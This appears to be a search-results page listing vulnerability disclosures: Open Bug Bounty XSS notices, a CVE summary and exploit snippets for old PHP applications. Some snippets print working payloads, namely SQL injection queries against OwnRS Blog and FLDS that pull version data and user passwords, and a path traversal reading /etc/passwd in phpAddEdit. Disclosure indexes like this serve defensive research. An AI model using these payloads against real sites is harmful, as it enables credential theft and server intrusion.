jira.pepejeans.com Cross Site Scripting vulnerability OBB-2327924

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

CVE-2020-19766

The time check operation of PepeAuctionSale 1.0 can be rendered ineffective by assigning a large number to the duration variable, compromising access control to the application...

pepe-clan.gamerch.com XSS vulnerability

Open Bug Bounty ID: OBB-651250 Description| Value ---|--- Affected Website:| pepe-clan.gamerch.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

fungamez rc1 - Authentication Bypass Local File Inclusion

fungamez rc1 - Authentication Bypass Local File Inclusion || || || -----------------------------------------\ == -- ----------- ---------------------------- ------------------/ ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O ¡PROUD TO BE SPANISH!...

OwnRS Blog 1.2 SQL Injection

OwnRS CMS autor.php SQL Injection Vulnerability Author: nuclear download: http://sourceforge.net/project/showfiles.php?groupid=230742 vuln: http://localhost/path/autor.php?id=' union select 1,2,3,4,5,@@version,7,8,9 ' required: magicquotesgpc == off; greetz Mi4night, cAs, zYzTeM, THEMAN, Pepe,...

OwnRS Blog 1.2 (autor.php) SQL Injection Vulnerability

No description provided by source. OwnRS CMS autor.php SQL Injection Vulnerability Author: nuclear download: http://sourceforge.net/project/showfiles.php?groupid=230742 vuln: http://localhost/path/autor.php?id=' union select 1,2,3,4,5,@@version,7,8,9 ' required: magicquotesgpc == off; greetz...

OwnRS Blog 1.2 - autor.php SQL Injection

OwnRS Blog 1.2 - autor.php SQL Injection OwnRS CMS autor.php SQL Injection Vulnerability Author: nuclear download: http://sourceforge.net/project/showfiles.php?groupid=230742 vuln: http://localhost/path/autor.php?id=' union select 1,2,3,4,5,@@version,7,8,9 ' required: magicquotesgpc == off; greet...

FLDS 1.2a SQL Injection In lpro.php

Free Links Directory Script id SQL Injection Vulnerability Author: nuclear site: http://flds-script.com vuln: http://localhost/path/lpro.php?id=-1 UNION SELECT 1,concatusername,0x3a,password,3,4,5,6,7,8,9,10,11 from users demo:...

phpAddEdit 1.3 - editform Local File Inclusion

phpAddEdit 1.3 - editform Local File Inclusion phpaddedit-1.3 LFI Author: nuclear script:http://sourceforge.net/projects/phpaddedit/ vuln:http://target.com/addedit-render.php?editform=../../../../../../../etc/passwd%00 vulnerable code: if !$formname && $GET"editform" $formname = $GET"editform";...